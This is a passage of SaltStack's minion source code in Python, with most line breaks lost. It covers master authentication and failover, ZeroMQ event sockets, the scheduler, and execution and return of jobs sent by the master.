invalid_kwargs.append('{0}'.format(arg)) continue else: _args.append(arg) if invalid_kwargs: raise SaltInvocationError( 'The following keyword arguments are not valid: {0}' .format(', '.join(invalid_kwargs)) ) if argspec.keywords and isinstance(data, dict): # this function accepts **kwargs, pack in the publish data for key, val in data.items(): _kwargs['__pub_{0}'.format(key)] = val return _args, _kwargs class SMinion(object): ''' Create an object that has loaded all of the minion module functions, grains, modules, returners etc. The SMinion allows developers to generate all of the salt minion functions and present them with these functions for general use. ''' def __init__(self, opts): # Late setup of the opts grains, so we can log from the grains module opts['grains'] = salt.loader.grains(opts) self.opts = opts # Clean out the proc directory (default /var/cache/salt/minion/proc) if (self.opts.get('file_client', 'remote') == 'remote' or self.opts.get('use_master_when_local', False)): if isinstance(self.opts['master'], list): masters = self.opts['master'] if self.opts['random_master'] is True: shuffle(masters) for master in masters: self.opts['master'] = master self.opts.update(resolve_dns(opts)) try: self.gen_modules() break except SaltClientError: log.warning(('Attempted to authenticate with master ' '{0} and failed'.format(master))) continue else: if self.opts['random_master'] is True: log.warning('random_master is True but there is only one master specified. 
Ignoring.') self.opts.update(resolve_dns(opts)) self.gen_modules(initial_load=True) else: self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Load all of the modules for the minion ''' self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['environment'], ).compile_pillar() self.functions = salt.loader.minion_mods(self.opts, include_errors=True) self.function_errors = self.functions['_errors'] self.functions.pop('_errors') # Keep the funcs clean self.returners = salt.loader.returners(self.opts, self.functions) self.states = salt.loader.states(self.opts, self.functions) self.rend = salt.loader.render(self.opts, self.functions) self.matcher = Matcher(self.opts, self.functions) self.functions['sys.reload_modules'] = self.gen_modules class MinionBase(object): def __init__(self, opts): self.opts = opts def _init_context_and_poller(self): self.context = zmq.Context() self.poller = zmq.Poller() def _prepare_minion_event_system(self): # Prepare the minion event system # # Start with the publish socket self._init_context_and_poller() hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5')) # Only use the first 10 chars to keep longer hashes from exceeding the # max socket path length. 
id_hash = hash_type(self.opts['id']).hexdigest()[:10] epub_sock_path = os.path.join( self.opts['sock_dir'], 'minion_event_{0}_pub.ipc'.format(id_hash) ) if os.path.exists(epub_sock_path): os.unlink(epub_sock_path) epull_sock_path = os.path.join( self.opts['sock_dir'], 'minion_event_{0}_pull.ipc'.format(id_hash) ) if os.path.exists(epull_sock_path): os.unlink(epull_sock_path) self.epub_sock = self.context.socket(zmq.PUB) if self.opts.get('ipc_mode', '') == 'tcp': epub_uri = 'tcp://127.0.0.1:{0}'.format( self.opts['tcp_pub_port'] ) epull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts['tcp_pull_port'] ) else: epub_uri = 'ipc://{0}'.format(epub_sock_path) salt.utils.zeromq.check_ipc_path_max_len(epub_uri) epull_uri = 'ipc://{0}'.format(epull_sock_path) salt.utils.zeromq.check_ipc_path_max_len(epull_uri) log.debug( '{0} PUB socket URI: {1}'.format( self.__class__.__name__, epub_uri ) ) log.debug( '{0} PULL socket URI: {1}'.format( self.__class__.__name__, epull_uri ) ) # Check to make sure the sock_dir is available, create if not default_minion_sock_dir = os.path.join( salt.syspaths.SOCK_DIR, 'minion' ) minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir) if not os.path.isdir(minion_sock_dir): # Let's try to create the directory defined on the configuration # file try: os.makedirs(minion_sock_dir, 0o755) except OSError as exc: log.error('Could not create SOCK_DIR: {0}'.format(exc)) # Let's not fail yet and try using the default path if minion_sock_dir == default_minion_sock_dir: # We're already trying the default system path, stop now! 
raise if not os.path.isdir(default_minion_sock_dir): try: os.makedirs(default_minion_sock_dir, 0o755) except OSError as exc: log.error('Could not create SOCK_DIR: {0}'.format(exc)) # Let's stop at this stage raise # Create the pull socket self.epull_sock = self.context.socket(zmq.PULL) # Securely bind the event sockets if self.opts.get('ipc_mode', '') != 'tcp': old_umask = os.umask(0o177) try: log.info('Starting pub socket on {0}'.format(epub_uri)) self.epub_sock.bind(epub_uri) log.info('Starting pull socket on {0}'.format(epull_uri)) self.epull_sock.bind(epull_uri) finally: if self.opts.get('ipc_mode', '') != 'tcp': os.umask(old_umask) @staticmethod def process_schedule(minion, loop_interval): try: minion.schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if minion.schedule.loop_interval < loop_interval: loop_interval = minion.schedule.loop_interval log.debug( 'Overriding loop_interval because of scheduled jobs.' ) except Exception as exc: log.error( 'Exception {0} occurred in scheduled job'.format(exc) ) return loop_interval class MasterMinion(object): ''' Create a fully loaded minion function object for generic use on the master. What makes this class different is that the pillar is omitted, otherwise everything else is loaded cleanly. 
''' def __init__( self, opts, returners=True, states=True, rend=True, matcher=True, whitelist=None): self.opts = salt.config.minion_config(opts['conf_file']) self.opts.update(opts) self.whitelist = whitelist self.opts['grains'] = salt.loader.grains(opts) self.opts['pillar'] = {} self.mk_returners = returners self.mk_states = states self.mk_rend = rend self.mk_matcher = matcher self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Load all of the modules for the minion ''' self.functions = salt.loader.minion_mods( self.opts, whitelist=self.whitelist, initial_load=initial_load) if self.mk_returners: self.returners = salt.loader.returners(self.opts, self.functions) if self.mk_states: self.states = salt.loader.states(self.opts, self.functions) if self.mk_rend: self.rend = salt.loader.render(self.opts, self.functions) if self.mk_matcher: self.matcher = Matcher(self.opts, self.functions) self.functions['sys.reload_modules'] = self.gen_modules class MultiMinion(MinionBase): ''' Create a multi minion interface, this creates as many minions as are defined in the master option and binds each minion object to a respective master. 
'''
    # Timeout (seconds) for one of the minions to auth with a master before
    # tune_in gives up on that master for this attempt.
    MINION_CONNECT_TIMEOUT = 5

    def __init__(self, opts):
        super(MultiMinion, self).__init__(opts)

    def minions(self):
        '''
        Return a dict of minion generators bound to the tune_in method
        dict of master -> minion_mapping, the mapping contains:
            opts: options used to create the minion
            last: last auth attempt time
            auth_wait: time to wait for next auth attempt
            minion: minion object
            generator: generator function (non-blocking tune_in)
        '''
        # Multi-master mode requires a list of masters; refuse to start with
        # a single scalar master.
        if not isinstance(self.opts['master'], list):
            log.error(
                'Attempting to start a multimaster system with one master')
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        ret = {}
        # set() de-duplicates masters listed more than once in the config.
        for master in set(self.opts['master']):
            # Each master gets its own shallow copy of the opts so the
            # per-master 'master' key does not clobber the others.
            s_opts = copy.copy(self.opts)
            s_opts['master'] = master
            s_opts['multimaster'] = True
            ret[master] = {'opts': s_opts,
                           'last': time.time(),
                           'auth_wait': s_opts['acceptance_wait_time']}
            try:
                # safe=False: a failed auth raises instead of retrying forever,
                # so one dead master does not block the others.
                minion = Minion(s_opts, self.MINION_CONNECT_TIMEOUT, False)
                ret[master]['minion'] = minion
                ret[master]['generator'] = minion.tune_in_no_block()
            except SaltClientError as exc:
                # Connection failure is tolerated here; tune_in() keeps
                # retrying this master later using last/auth_wait above.
                log.error('Error while bringing up minion for multi-master. 
Is master at {0} responding?'.format(master)) return ret # Multi Master Tune In def tune_in(self): ''' Bind to the masters This loop will attempt to create connections to masters it hasn't connected to yet, but once the initial connection is made it is up to ZMQ to do the reconnect (don't know of an API to get the state here in salt) ''' self._prepare_minion_event_system() self.poller.register(self.epull_sock, zmq.POLLIN) # Prepare the minion generators minions = self.minions() loop_interval = int(self.opts['loop_interval']) auth_wait = self.opts['acceptance_wait_time'] max_wait = self.opts['acceptance_wait_time_max'] while True: package = None for minion in minions.values(): if isinstance(minion, dict): minion = minion['minion'] if not hasattr(minion, 'schedule'): continue loop_interval = self.process_schedule(minion, loop_interval) socks = dict(self.poller.poll(1)) if socks.get(self.epull_sock) == zmq.POLLIN: try: package = self.epull_sock.recv(zmq.NOBLOCK) except Exception: pass masters = list(minions.keys()) shuffle(masters) # Do stuff per minion that we have for master in masters: minion = minions[master] # if we haven't connected yet, lets attempt some more. # make sure to keep separate auth_wait times, since these # are separate masters if 'generator' not in minion: if time.time() - minion['auth_wait'] > minion['last']: minion['last'] = time.time() if minion['auth_wait'] < max_wait: minion['auth_wait'] += auth_wait try: t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False) minions[master]['minion'] = t_minion minions[master]['generator'] = t_minion.tune_in_no_block() minions[master]['auth_wait'] = self.opts['acceptance_wait_time'] except SaltClientError: log.error('Error while bring up minion for multi-master. 
Is master {0} responding?'.format(master)) continue else: continue # run scheduled jobs if you have them loop_interval = self.process_schedule(minion['minion'], loop_interval) # if you have an event to handle, do it on a single minion # (first one to not throw an exception) if package: # If we need to expand this, we may want to consider a specific header # or another approach entirely. if package.startswith('_minion_mine'): for multi_minion in minions: try: minions[master]['minion'].handle_event(package) except Exception: pass else: try: minion['minion'].handle_event(package) package = None self.epub_sock.send(package) except Exception: pass # have the Minion class run anything it has to run next(minion['generator']) class Minion(MinionBase): ''' This class instantiates a minion, runs connections for a minion, and loads all of the functions into the minion ''' def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231 ''' Pass in the options dict ''' self._running = None # Warn if ZMQ < 3.2 if HAS_ZMQ: try: zmq_version_info = zmq.zmq_version_info() except AttributeError: # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to # using zmq.zmq_version() and build a version info tuple. zmq_version_info = tuple( [int(x) for x in zmq.zmq_version().split('.')] ) if zmq_version_info < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' 
) # Late setup the of the opts grains, so we can log from the grains # module opts['grains'] = salt.loader.grains(opts) # evaluate the master to connect to and authenticate with it opts['master'] = self.eval_master(opts, timeout, safe) self.functions, self.returners, self.function_errors = self._load_modules() self.opts['pillar'] = salt.pillar.get_pillar( opts, opts['grains'], opts['id'], opts['environment'], funcs=self.functions ).compile_pillar() self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() self.matcher = Matcher(self.opts, self.functions) self.proc_dir = get_proc_dir(opts['cachedir']) self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners) # add default scheduling jobs to the minions scheduler if 'mine.update' in self.functions: log.info('Added mine.update to scheduler') self.schedule.add_job({ '__mine_interval': { 'function': 'mine.update', 'minutes': opts['mine_interval'], 'jid_include': True, 'maxrunning': 2 } }) # add master_alive job if enabled if self.opts['master_alive_interval'] > 0: self.schedule.add_job({ '__master_alive': { 'function': 'status.master', 'seconds': opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'kwargs': {'master_ip': self.opts['master'], 'connected': True} } }) self.grains_cache = self.opts['grains'] # store your hexid to subscribe to zmq, hash since zmq filters are prefix # matches this way we can avoid collisions self.hexid = hashlib.sha1(self.opts['id']).hexdigest() if 'proxy' in self.opts['pillar']: log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'], self.opts['pillar']['proxy'])) for p in self.opts['pillar']['proxy']: log.debug('Starting {0} proxy.'.format(p)) pid = os.fork() if pid > 0: continue else: proxyminion = salt.ProxyMinion() proxyminion.start(self.opts['pillar']['proxy'][p]) self.clean_die(signal.SIGTERM, None) else: log.debug('I am {0} and I am not supposed to start any proxies. 
' '(Likely not a problem)'.format(self.opts['id'])) # __init__() from MinionBase is called in Minion.eval_master() def eval_master(self, opts, timeout=60, safe=True, failed=False): ''' Evaluates and returns the current master address. In standard mode, just calls authenticate() with the given master address. With master_type=func evaluates the current master address from the given module and then calls authenticate(). With master_type=failover takes the list of masters and loops through them. The first one that allows the minion to connect is used to authenticate() and then returned. If this function is called outside the minions initialization phase (for example from the minions main event-loop when a master connection loss was detected), 'failed' should be set to True. The current (possibly failed) master will then be removed from the list of masters. ''' # check if master_type was altered from its default if opts['master_type'] != 'str': # check for a valid keyword if opts['master_type'] == 'func': # split module and function and try loading the module mod, fun = opts['master'].split('.') try: master_mod = salt.loader.raw_mod(opts, mod, fun) if not master_mod: raise TypeError # we take whatever the module returns as master address opts['master'] = master_mod[mod + '.' 
+ fun]() except TypeError: msg = ('Failed to evaluate master address from ' 'module \'{0}\''.format(opts['master'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) log.info('Evaluated master from module: {0}'.format(master_mod)) # if failover is set, master has to be of type list elif opts['master_type'] == 'failover': if isinstance(opts['master'], list): log.info('Got list of available master addresses:' ' {0}'.format(opts['master'])) if opts['master_shuffle']: shuffle(opts['master']) elif opts['__role'] == 'syndic': log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master'])) # if failed=True, the minion was previously connected # we're probably called from the minions main-event-loop # because a master connection loss was detected. remove # the possibly failed master from the list of masters. elif failed: log.info('Removing possibly failed master {0} from list of' ' masters'.format(opts['master'])) # create new list of master with the possibly failed one removed opts['master'] = [x for x in opts['master_list'] if opts['master'] != x] else: msg = ('master_type set to \'failover\' but \'master\' ' 'is not of type list but of type ' '{0}'.format(type(opts['master']))) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) else: msg = ('Invalid keyword \'{0}\' for variable ' '\'master_type\''.format(opts['master_type'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # if we have a list of masters, loop through them and be # happy with the first one that allows us to connect if isinstance(opts['master'], list): conn = False # shuffle the masters and then loop through them local_masters = copy.copy(opts['master']) for master in local_masters: opts['master'] = master opts.update(resolve_dns(opts)) super(Minion, self).__init__(opts) # on first run, update self.opts with the whole master list # to enable a minion to re-use old masters if they get fixed if 'master_list' not in self.opts: self.opts['master_list'] = 
local_masters try: if self.authenticate(timeout, safe) != 'full': conn = True break except SaltClientError: msg = ('Master {0} could not be reached, trying ' 'next master (if any)'.format(opts['master'])) log.info(msg) continue if not conn: self.connected = False msg = ('No master could be reached or all masters denied ' 'the minions connection attempt.') log.error(msg) else: self.connected = True return opts['master'] # single master sign in else: opts.update(resolve_dns(opts)) super(Minion, self).__init__(opts) if self.authenticate(timeout, safe) == 'full': self.connected = False msg = ('master {0} rejected the minions connection because too ' 'many minions are already connected.'.format(opts['master'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) else: self.connected = True return opts['master'] def _prep_mod_opts(self): ''' Returns a copy of the opts with key bits stripped out ''' mod_opts = {} for key, val in self.opts.items(): if key == 'logger': continue mod_opts[key] = val return mod_opts def _load_modules(self, force_refresh=False): ''' Return the functions and the returners loaded up from the loader module ''' # if this is a *nix system AND modules_max_memory is set, lets enforce # a memory limit on module imports # this feature ONLY works on *nix like OSs (resource module doesn't work on windows) modules_max_memory = False if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE: log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory'])) modules_max_memory = True old_mem_limit = resource.getrlimit(resource.RLIMIT_AS) rss, vms = psutil.Process(os.getpid()).get_memory_info() mem_limit = rss + vms + self.opts['modules_max_memory'] resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit)) elif self.opts.get('modules_max_memory', -1) > 0: if not HAS_PSUTIL: log.error('Unable to enforce modules_max_memory because psutil is missing') if not HAS_RESOURCE: log.error('Unable to 
enforce modules_max_memory because resource is missing') self.opts['grains'] = salt.loader.grains(self.opts, force_refresh) if self.opts.get('multimaster', False): s_opts = copy.copy(self.opts) functions = salt.loader.minion_mods(s_opts) else: functions = salt.loader.minion_mods(self.opts) returners = salt.loader.returners(self.opts, functions) errors = {} if '_errors' in functions: errors = functions['_errors'] functions.pop('_errors') # we're done, reset the limits! if modules_max_memory is True: resource.setrlimit(resource.RLIMIT_AS, old_mem_limit) return functions, returners, errors def _fire_master(self, data=None, tag=None, events=None, pretag=None): ''' Fire an event on the master, or drop message if unable to send. ''' load = {'id': self.opts['id'], 'cmd': '_minion_event', 'pretag': pretag, 'tok': self.tok} if events: load['events'] = events elif data and tag: load['data'] = data load['tag'] = tag elif not data and tag: load['data'] = {} load['tag'] = tag else: return channel = salt.transport.Channel.factory(self.opts) try: result = channel.send(load) except Exception: log.info("fire_master failed: {0}".format(traceback.format_exc())) def _handle_payload(self, payload): ''' Takes a payload from the master publisher and does whatever the master wants done. 
''' {'aes': self._handle_aes, 'pub': self._handle_pub, 'clear': self._handle_clear}[payload['enc']](payload['load'], payload['sig'] if 'sig' in payload else None) def _handle_aes(self, load, sig=None): ''' Takes the AES encrypted load, checks the signature if pub signatures are turned on, decrypts it, and runs the encapsulated instructions ''' # Verify that the signature is valid master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub') if sig and self.functions['config.get']('sign_pub_messages'): if not salt.crypt.verify_signature(master_pubkey_path, load, sig): raise AuthenticationError('Message signature failed to validate.') try: data = self.crypticle.loads(load) except AuthenticationError: # decryption of the payload failed, try to re-auth but wait # random seconds if set in config with random_reauth_delay if 'random_reauth_delay' in self.opts: reauth_delay = randint(0, float(self.opts['random_reauth_delay'])) # This mitigates the issue wherein a long-running job might not return # on a master key rotation. However, new commands issued during the re-auth # splay period will still fail to return. if not salt.utils.minion.running(self.opts): log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay)) time.sleep(reauth_delay) else: log.warning('Ignoring re-auth delay because jobs are running') self.authenticate() data = self.crypticle.loads(load) # Verify that the publication is valid if 'tgt' not in data or 'jid' not in data or 'fun' not in data \ or 'arg' not in data: return # Verify that the publication applies to this minion # It's important to note that the master does some pre-processing # to determine which minions to send a request to. So for example, # a "salt -G 'grain_key:grain_val' test.ping" will invoke some # pre-processing on the master and this minion should not see the # publication if the master does not determine that it should. 
if 'tgt_type' in data: match_func = getattr(self.matcher, '{0}_match'.format(data['tgt_type']), None) if match_func is None: return if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'): delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM) if not match_func(data['tgt'], delimiter=delimiter): return elif not match_func(data['tgt']): return else: if not self.matcher.glob_match(data['tgt']): return # If the minion does not have the function, don't execute, # this prevents minions that could not load a minion module # from returning a predictable exception #if data['fun'] not in self.functions: # return if 'user' in data: log.info( 'User {0[user]} Executing command {0[fun]} with jid ' '{0[jid]}'.format(data) ) else: log.info( 'Executing command {0[fun]} with jid {0[jid]}'.format(data) ) log.debug('Command details {0}'.format(data)) self._handle_decoded_payload(data) def _handle_pub(self, load): ''' Handle public key payloads ''' pass def _handle_clear(self, load): ''' Handle un-encrypted transmissions ''' pass def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' if isinstance(data['fun'], string_types): if data['fun'] == 'sys.reload_modules': self.functions, self.returners, self.function_errors = self._load_modules() self.schedule.functions = self.functions self.schedule.returners = self.returners if isinstance(data['fun'], tuple) or isinstance(data['fun'], list): target = Minion._thread_multi_return else: target = Minion._thread_return # We stash an instance references to allow for the socket # communication in Windows. You can't pickle functions, and thus # python needs to be able to reconstruct the reference on the other # side. 
instance = self # If we are running in multi-master mode, re-inject opts into module funcs if instance.opts.get('multimaster', False): for func in instance.functions: sys.modules[instance.functions[func].__module__].__opts__ = self.opts if self.opts['multiprocessing']: if sys.platform.startswith('win'): # let python reconstruct the minion on the other side if we're # running on windows instance = None process = multiprocessing.Process( target=target, args=(instance, self.opts, data) ) else: process = threading.Thread( target=target, args=(instance, self.opts, data), name=data['jid'] ) process.start() if not sys.platform.startswith('win'): process.join() @classmethod def _thread_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' # this seems awkward at first, but it's a workaround for Windows # multiprocessing communication. if not minion_instance: minion_instance = cls(opts) fn_ = os.path.join(minion_instance.proc_dir, data['jid']) if opts['multiprocessing']: salt.utils.daemonize_if(opts) salt.utils.appendproctitle(data['jid']) sdata = {'pid': os.getpid()} sdata.update(data) log.info('Starting a new job with PID {0}'.format(sdata['pid'])) with salt.utils.fopen(fn_, 'w+b') as fp_: fp_.write(minion_instance.serial.dumps(sdata)) ret = {'success': False} function_name = data['fun'] if function_name in minion_instance.functions: try: func = minion_instance.functions[data['fun']] args, kwargs = load_args_and_kwargs( func, data['arg'], data) sys.modules[func.__module__].__context__['retcode'] = 0 return_data = func(*args, **kwargs) if isinstance(return_data, types.GeneratorType): ind = 0 iret = {} for single in return_data: if isinstance(single, dict) and isinstance(iret, dict): iret.update(single) else: if not iret: iret = [] iret.append(single) tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job') event_data = {'return': single} minion_instance._fire_master(event_data, 
tag) ind += 1 ret['return'] = iret else: ret['return'] = return_data ret['retcode'] = sys.modules[func.__module__].__context__.get( 'retcode', 0 ) ret['success'] = True except CommandNotFoundError as exc: msg = 'Command required for {0!r} not found'.format( function_name ) log.debug(msg, exc_info=True) ret['return'] = '{0}: {1}'.format(msg, exc) ret['out'] = 'nested' except CommandExecutionError as exc: log.error( 'A command in {0!r} had a problem: {1}'.format( function_name, exc ), exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR: {0}'.format(exc) ret['out'] = 'nested' except SaltInvocationError as exc: log.error( 'Problem executing {0!r}: {1}'.format( function_name, exc ), exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR executing {0!r}: {1}'.format( function_name, exc ) ret['out'] = 'nested' except TypeError as exc: msg = ('TypeError encountered executing {0}: {1}. See ' 'debug log for more info.').format(function_name, exc) log.warning(msg, exc_info_on_loglevel=logging.DEBUG) ret['return'] = msg ret['out'] = 'nested' except Exception: msg = 'The minion function caused an exception' log.warning(msg, exc_info_on_loglevel=logging.DEBUG) ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc()) ret['out'] = 'nested' else: ret['return'] = '{0!r} is not available.'.format(function_name) mod_name = function_name.split('.')[0] if mod_name in minion_instance.function_errors: ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name]) ret['success'] = False ret['retcode'] = 254 ret['out'] = 'nested' ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'master_id' in data: ret['master_id'] = data['master_id'] if 'metadata' in data: if isinstance(data['metadata'], dict): ret['metadata'] = data['metadata'] else: log.warning('The metadata parameter must be a dictionary. 
Ignoring.') minion_instance._return_pub(ret) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] ret['id'] = opts['id'] for returner in set(data['ret'].split(',')): try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job {0} {1}'.format( data['jid'], exc ) ) log.error(traceback.format_exc()) @classmethod def _thread_multi_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' salt.utils.appendproctitle(data['jid']) # this seems awkward at first, but it's a workaround for Windows # multiprocessing communication. if not minion_instance: minion_instance = cls(opts) ret = { 'return': {}, 'success': {}, } for ind in range(0, len(data['fun'])): ret['success'][data['fun'][ind]] = False try: func = minion_instance.functions[data['fun'][ind]] args, kwargs = load_args_and_kwargs( func, data['arg'][ind], data) ret['return'][data['fun'][ind]] = func(*args, **kwargs) ret['success'][data['fun'][ind]] = True except Exception as exc: trb = traceback.format_exc() log.warning( 'The minion function caused an exception: {0}'.format( exc ) ) ret['return'][data['fun'][ind]] = trb ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'metadata' in data: ret['metadata'] = data['metadata'] minion_instance._return_pub(ret) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] for returner in set(data['ret'].split(',')): ret['id'] = opts['id'] try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job {0} {1}'.format( data['jid'], exc ) ) def _return_pub(self, ret, ret_cmd='_return'): ''' Return the data from the executed command to the master server ''' jid = ret.get('jid', ret.get('__jid__')) fun = ret.get('fun', ret.get('__fun__')) if self.opts['multiprocessing']: fn_ = 
os.path.join(self.proc_dir, jid) if os.path.isfile(fn_): try: os.remove(fn_) except (OSError, IOError): # The file is gone already pass log.info('Returning information for job: {0}'.format(jid)) channel = salt.transport.Channel.factory(self.opts) if ret_cmd == '_syndic_return': load = {'cmd': ret_cmd, 'id': self.opts['id'], 'jid': jid, 'fun': fun, 'load': ret.get('__load__')} load['return'] = {} for key, value in ret.items(): if key.startswith('__'): continue load['return'][key] = value else: load = {'cmd': ret_cmd, 'id': self.opts['id']} for key, value in list(ret.items()): load[key] = value if 'out' in ret: if isinstance(ret['out'], string_types): load['out'] = ret['out'] else: log.error('Invalid outputter {0}. This is likely a bug.' .format(ret['out'])) else: try: oput = self.functions[fun].__outputter__ except (KeyError, AttributeError, TypeError): pass else: if isinstance(oput, string_types): load['out'] = oput if self.opts['cache_jobs']: # Local job cache has been enabled fn_ = os.path.join( self.opts['cachedir'], 'minion_jobs', load['jid'], 'return.p') jdir = os.path.dirname(fn_) if not os.path.isdir(jdir): os.makedirs(jdir) salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret)) try: ret_val = channel.send(load) except SaltReqTimeoutError: msg = ('The minion failed to return the job information for job ' '{0}. This is often due to the master being shut down or ' 'overloaded. 
If the master is running consider increasing ' 'the worker_threads value.').format(jid) log.warn(msg) return '' log.trace('ret_val = {0}'.format(ret_val)) return ret_val def _state_run(self): ''' Execute a state run based on information set in the minion config file ''' if self.opts['startup_states']: data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')} if self.opts['startup_states'] == 'sls': data['fun'] = 'state.sls' data['arg'] = [self.opts['sls_list']] elif self.opts['startup_states'] == 'top': data['fun'] = 'state.top' data['arg'] = [self.opts['top_file']] else: data['fun'] = 'state.highstate' data['arg'] = [] self._handle_decoded_payload(data) def _refresh_grains_watcher(self, refresh_interval_in_minutes): ''' Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion :param refresh_interval_in_minutes: :return: None ''' if '__update_grains' not in self.opts.get('schedule', {}): if 'schedule' not in self.opts: self.opts['schedule'] = {} self.opts['schedule'].update({ '__update_grains': { 'function': 'event.fire', 'args': [{}, 'grains_refresh'], 'minutes': refresh_interval_in_minutes } }) def _set_tcp_keepalive(self): if hasattr(zmq, 'TCP_KEEPALIVE'): self.socket.setsockopt( zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive'] ) self.socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle'] ) self.socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt'] ) self.socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl'] ) def _set_reconnect_ivl(self): recon_delay = self.opts['recon_default'] if self.opts['recon_randomize']: recon_delay = randint(self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max'] ) log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format( self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max'], recon_delay) ) log.debug("Setting zmq_reconnect_ivl to 
def _setsockopts(self):
    '''
    Apply subscription and identity options to the minion's SUB socket,
    then the shared tuning options (IPv4-only, reconnect backoff cap,
    TCP keepalive).
    '''
    sock = self.socket
    if self.opts['zmq_filtering']:
        # TODO: constants file for "broadcast"
        sock.setsockopt(zmq.SUBSCRIBE, 'broadcast')
        sock.setsockopt(zmq.SUBSCRIBE, self.hexid)
    else:
        # No zmq-level filtering: receive every publication.
        sock.setsockopt(zmq.SUBSCRIBE, '')
    sock.setsockopt(zmq.IDENTITY, self.opts['id'])
    self._set_ipv4only()
    self._set_reconnect_ivl_max()
    self._set_tcp_keepalive()
def module_refresh(self, force_refresh=False):
    '''
    Reload execution modules and returners, then point the scheduler
    at the freshly loaded function tables.

    :param force_refresh: passed through to the module loader
    '''
    funcs, rets, _ = self._load_modules(force_refresh)
    self.functions = funcs
    self.returners = rets
    # Keep the scheduler in sync with the reloaded tables.
    self.schedule.functions = funcs
    self.schedule.returners = rets
def clean_die(self, signum, frame):
    '''
    Python does not handle the SIGTERM cleanly, if it is signaled exit
    the minion process cleanly

    :param signum: delivered signal number (unused beyond handler contract)
    :param frame: current stack frame (unused)
    :raises SystemExit: always, with exit code 0
    '''
    self._running = False
    # Raise SystemExit directly instead of calling the ``exit()`` builtin:
    # ``exit`` is injected by the ``site`` module and may be missing under
    # ``python -S`` or in frozen/embedded interpreters. Behavior is
    # otherwise identical (``exit(0)`` raises SystemExit(0) too).
    raise SystemExit(0)
def _mine_send(self, package):
    '''
    Send mine data to the master

    :param package: raw event package containing the mine load
    :return: whatever the master channel returns for the send
    '''
    # Unpack the load first; channel creation is independent of it.
    load = salt.utils.event.SaltEvent.unpack(package)[1]
    channel = salt.transport.Channel.factory(self.opts)
    return channel.send(load)
'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master_ip': self.opts['master'], 'connected': False} } self.schedule.modify_job(name='__master_alive', schedule=schedule) log.info('Connection to master {0} lost'.format(self.opts['master'])) if self.opts['master_type'] == 'failover': log.info('Trying to tune in to next master from master-list') # if eval_master finds a new master for us, self.connected # will be True again on successfull master authentication self.opts['master'] = self.eval_master(opts=self.opts, failed=True) if self.connected: # re-init the subsystems to work with the new master log.info('Re-initialising subsystems for new ' 'master {0}'.format(self.opts['master'])) del self.socket del self.context del self.poller self._init_context_and_poller() self.socket = self.context.socket(zmq.SUB) self._set_reconnect_ivl() self._setsockopts() self.socket.connect(self.master_pub) self.poller.register(self.socket, zmq.POLLIN) self.poller.register(self.epull_sock, zmq.POLLIN) self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # update scheduled job to run with the new master addr schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master_ip': self.opts['master'], 'connected': True} } self.schedule.modify_job(name='__master_alive', 